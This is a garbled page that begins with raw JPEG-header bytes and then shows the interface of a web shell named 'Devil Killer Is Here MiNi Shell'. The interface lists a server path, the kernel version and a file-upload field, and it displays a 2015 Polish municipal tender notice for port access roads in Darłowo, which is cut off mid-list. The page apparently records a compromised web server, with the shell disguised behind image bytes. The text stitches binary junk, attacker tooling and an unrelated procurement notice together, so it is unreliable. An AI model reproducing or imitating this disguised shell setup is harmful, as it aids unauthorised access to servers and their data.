JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150515/114554-N-2015.html

<p class="kh_header"><b>Darłowo: Poprawa dostępności do portu morskiego w Darłowie z sieci dróg krajowych i wojewódzkich poprzez budowę dróg dojazdowych</b><br>
<b>Numer ogłoszenia: 114554 - 2015; data zamieszczenia: 15.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Darłowo , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3142223 do 26, faks 94 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa dostępności do portu morskiego w Darłowie z sieci dróg krajowych i wojewódzkich poprzez budowę dróg dojazdowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.2.	Zakres zamówienia obejmuje:

1.Przedmiotem zamówienia jest budowa drogi do portu morskiego w Darłowie o długości 0,682 km poprzez: 
- dokończenie jednego z wylotów ronda (wykonanie na odcinku około 35 m ciągu pieszo - rowerowego połączonego przejściem dla pieszych, dokończenie wyspy dzielącej wloty na rondo, dokończenie wlotów na rondo);
- budowę odcinka drogi o długości 0,682km wraz z ciągiem pieszo - rowerowym. Droga w kategorii ruchu KR3 (100 kN /oś), jednojezdniowa o szerokość 7,0 m, dwukierunkowa o nawierzchni asfaltowej, wykonana w nasypie.
Po jej lewej stronie zaprojektowano ciąg pieszo - rowerowy o szerokości 3,5m, oddzielony od jezdni pasem zieleni szerokości 3,0m. Pobocza o szerokości 0,75m. Główny ciąg jezdni ograniczony krawężnikami betonowymi ciężkimi wystającymi o świetle 12 cm, ciąg pieszo - rowerowy ograniczony obrzeżami betonowymi o świetle +3 i +0 cm. Konstrukcja drogi wg projektu budowlano - wykonawczego. 

UWAGA!!!
W dokumentacji technicznej załączonej do opisu przedmiotu zamówienia zakres dotyczący budowy drogi określony został jako III etap i ten należy wycenić. Zakres określony w załączonej dokumentacji, jako II etap jest na ukończeniu. 

We wszystkich przekrojach i opisach technicznych na nawierzchni ciągu pieszo-rowerowego, jako nawierzchnia występuje kostka betonowa antracytowa. Do wyceny nawierzchni ciągu pieszo - rowerowego należy przyjąć jej wykonanie z masy asfaltowej MMA. 

Ze względu na złe warunki gruntowe występujące w przebiegu drogi projektant przewidział na odcinku Etapu III do kilometra 1 +410 wzmocnienie konstrukcji. Szczegółowo opisane w załączonej dokumentacji technicznej. Zamawiający dopuszcza zmianę zastosowanej metody, pod warunkiem opracowania projektu zamiennego 
i uzyskania pisemnej zgody projektanta.

- budowę kanalizacji deszczowej 

UWAGA!!!
- nie należy wyceniać sieci wodociągowej biegnącej wzdłuż projektowanej drogi;
- nie należy wyceniać kanalizacji sanitarnej grawitacyjnej, kanalizacji sanitarnej tłocznej ani pompowni ścieków.
- w wycenie należy uwzględnić podczyszczenie rowów melioracyjnych na odcinku 
ok. 100m, do których nastąpi zrzut wód deszczowych z drogi.

- budowę oświetlenia ulicznego

UWAGA!!!
- nie należy wyceniać ułożenia kabla elektroenergetycznego 4x70 mm2 o dł. ok.740 mb zasilającego tłocznię ścieków;
- zasilanie linii oświetlenia z istniejącej szafki energetycznej znajdującej się przy stacji transformatorowej (rondo ul. Lotników Morskich) 
- droga wewnętrzna i plac - należy wycenić w miejscach projektowanych słupów oświetleniowych, słupy z panelem fotogalwanicznym i oświetleniem LED 
- droga wewnętrzna i plac - nie należy wyceniać ułożenia kabli elektroenergetycznych ani budowy nasłupowej stacji transformatorowej.

2. Przedmiotem zamówienia jest budowa drogi wewnętrznej portowej o długości 0,116km (nawierzchnia z kostki betonowej - dwuteownik, kolor grafit) poprzez:

- wykonanie odcinka drogi o szerokości 7,0 m i długości 116 m w nasypie; droga jednojezdniowa, dwukierunkowa o nawierzchni z kostki betonowej; ciąg jezdny ograniczony krawężnikami betonowymi ciężkimi wystającymi o świetle 12cm;
- budowę kanalizacji deszczowej połączonej z odcinkiem drogi określonym jako Etap III;
- budowę oświetlenia ulicznego:

UWAGA!!!
W miejscach projektowanych słupów oświetleniowych należy wycenić słupy z oprawą LED z ogniwami fotogalwanicznymi - 5 szt. 

Branża elektryczna wymaga usunięcia kolizji z linią SN poprzez postawienie dwóch słupów oraz skablowanie części sieci SN przebiegającej nad projektowaną ulicą.

Do wyceny nie należy wyceniać ułożenia kabli elektroenergetycznych ani budowy nasłupowej stacji transformatorowej.

3. Przedmiotem zamówienia jest budowa placu manewrowo - składowego o powierzchni 2369,00 m2:

- plac manewrowo - składowy o pow. 2369,00 m2 w nasypie z nawierzchnią z kostki betonowej (dwuteownik) kolor grafit;
- budowa odwodnienia połączonego z drogą wewnętrzną portową (patrz pkt 2);
- w miejscach projektowanych słupów oświetleniowych należy wycenić słupy z oprawą LED 
z ogniwami fotogalwanicznymi - 2 szt. 

UWAGA!!!
Urobek ziemny dla wszystkich trzech zakresów pozostaje dla Zamawiającego, a do wyceny należy skalkulować jego wywóz wraz z rozplantowaniem na odległość 1km. 

Szczegółowy zakres przedmiotu zamówienia zawarty jest w projekcie budowlano-wykonawczym, badaniach podłoża gruntowego oraz projekcie wzmocnienia podłoża gruntowego. Ze względu na to, iż projekty techniczne zawierają szerszy zakres niż przedmiot zamówienia,  cześć rysunków, opisów, zestawień została usunięta, aby nie komplikować wyceny zamówienia.

Podobnie należy podejść do załączonych specyfikacji technicznych wykonania i odbioru robót, których zakres jest większy niż opis przedmiotu zamówienia, stanowiących Rozdział IV niniejszej Specyfikacji Istotnych Warunków Zamówienia.
Wykonawca zobowiązuje się do wykonywania robót zgodnie z obowiązującymi przepisami, polskimi normami i zasadami wiedzy technicznej oraz należytą starannością w ich wykonywaniu, bezpieczeństwem, dobrą jakością i właściwą organizacją robót.

4.3. Przedmiot zamówienia obejmuje również:
- organizację i zagospodarowanie zaplecza budowy,
- prowadzenie robót zgodnie z tymczasową organizacją ruchu,
- wykonanie oznakowania pionowego oraz poziomego zgodnie ze stałą organizacją ruchu,
- pełną obsługę geodezyjną przez geodetę posiadającego uprawnienia do geodezyjnej obsługi inwestycji,
- zorganizowanie i przeprowadzenie niezbędnych prób, badań przez wyspecjalizowane 
i uprawnione laboratoria (wszystkie badania laboratoryjne niezbędne do odbioru robót    
zanikających) oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu 
robót objętych przedmiotem przetargu,
- po zakończeniu robót sporządzenie inwentaryzacji geodezyjnej, zatwierdzonej przez odpowiedni 
z uwagi na lokalizację robót, Urząd Geodezji i Kartografii i dostarczenie jej Zamawiającemu w dniu odbioru,
- po zakończeniu robót doprowadzenie do stanu pierwotnego terenu zaplecza budowy, demontaż obiektów tymczasowych oraz uporządkowanie terenu,
- sporządzenie protokołów badań i sprawdzeń oraz uzyskanie wszelkich niezbędnych 
uzgodnień.
UWAGA !!!

W dokumentacji projektowej (projektach budowlanych, specyfikacjach technicznych) realizowanego zadania mogą występować materiały opisane znakami towarowymi, 
a nawet nazwami producentów. Materiały te należy traktować jako przykładowe. Zamawiający dopuszcza zastosowanie materiałów równoważnych o nie gorszych parametrach i jakości wykonania. 

Ocena równoważności zastosowanych materiałów dokonana zostanie przez Zamawiającego po uzyskaniu opinii projektanta. 

Zamawiający dopuszcza również możliwość zamiany materiałów w czasie realizacji zamówienia przy zachowaniu warunków odnoszących się do dostarczenia materiałów służących ocenie równoważności..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9, 45.23.00.00-8, 45.31.61.10-9, 45.23.31.40-2, 45.23.32.20-7, 45.23.32.22-1, 45.23.32.90-8, 45.23.33.00-2, 45.23.14.00-9, 45.23.21.30-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 15.1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 120.000,00zł. (słownie: sto dwadzieścia tysięcy złotych 00/100).
15.2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy. Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy Zamawiającego: 
               Bałtycki Bank Spółdzielczy 09 8566 0003 0001 1149 2000 0002
Za datę wniesienia wadium wnoszonego w pieniądzu uważa się uznania rachunku bankowego Zamawiającego.
15.3.	Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale. Zamawiający zaleca załączenie oryginału wadium do oferty. 
15.4.	Wadium wnoszone przez konsorcjum w innej formie niż pieniądz może być wnoszone przez poszczególnych konsorcjantów. Ze złożonych dokumentów musi wynikać, że wadium zabezpiecza ofertę złożoną przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
15.5.	Zamawiający dokona zwrotu wadium, w przypadkach i na zasadach określonych 
w ustawie.
15.6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowałoby brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
15.7.	Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadkach gdy:
(1)	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
(2)	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
(3)	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
2 roboty budowlane, polegające na budowie nowej drogi o nawierzchni asfaltowej (wraz z siecią kanalizacji deszczowej i oświetleniem ulicznym), o długości min. 1 km każda z robót wraz z dokumentami potwierdzającymi, że wymieniona ww. wykazie robota budowlana została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. Na potwierdzenie należy dołączyć referencje, poświadczenia wykonawstwa robót.
Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować nw. osobami zdolnymi do wykonania niniejszego zamówienia: Kierownik budowy (jedna osoba) - Uprawnienia budowlane do kierowania robotami drogowymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień; Kierownik robót sanitarnych (jedna osoba) - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień; Kierownik robót elektrycznych (jedna osoba) - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień. Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o realizację zamówienia: 
(1)	powinien posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 3.000.000,00 zł (słownie: trzy miliony złotych 00/100);
(2)	powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 1.000.000,00 zł (słownie: jeden milion złotych 00/100).
Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w przypadku wystąpienia niżej wymienionych okoliczności, których Zamawiający nie był w stanie przewidzieć przed publikacją ogłoszenia o przetargu:

1.	Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Strony nie przewidywały w chwili zawierania Umowy, w tym m.in.:
- wystąpienie robót dodatkowych lub zamiennych nie wynikających z projektu budowlano-wykonawczego, których wykonanie uzależnia wykonanie zamówienia podstawowego,
- wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających wykonywanie robót zgodnie z ich technologią i warunkami technicznymi zapewniającymi właściwą jakość ich wykonania, albo innych zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy, potwierdzone przez instytucje właściwe w/w. zakresie,
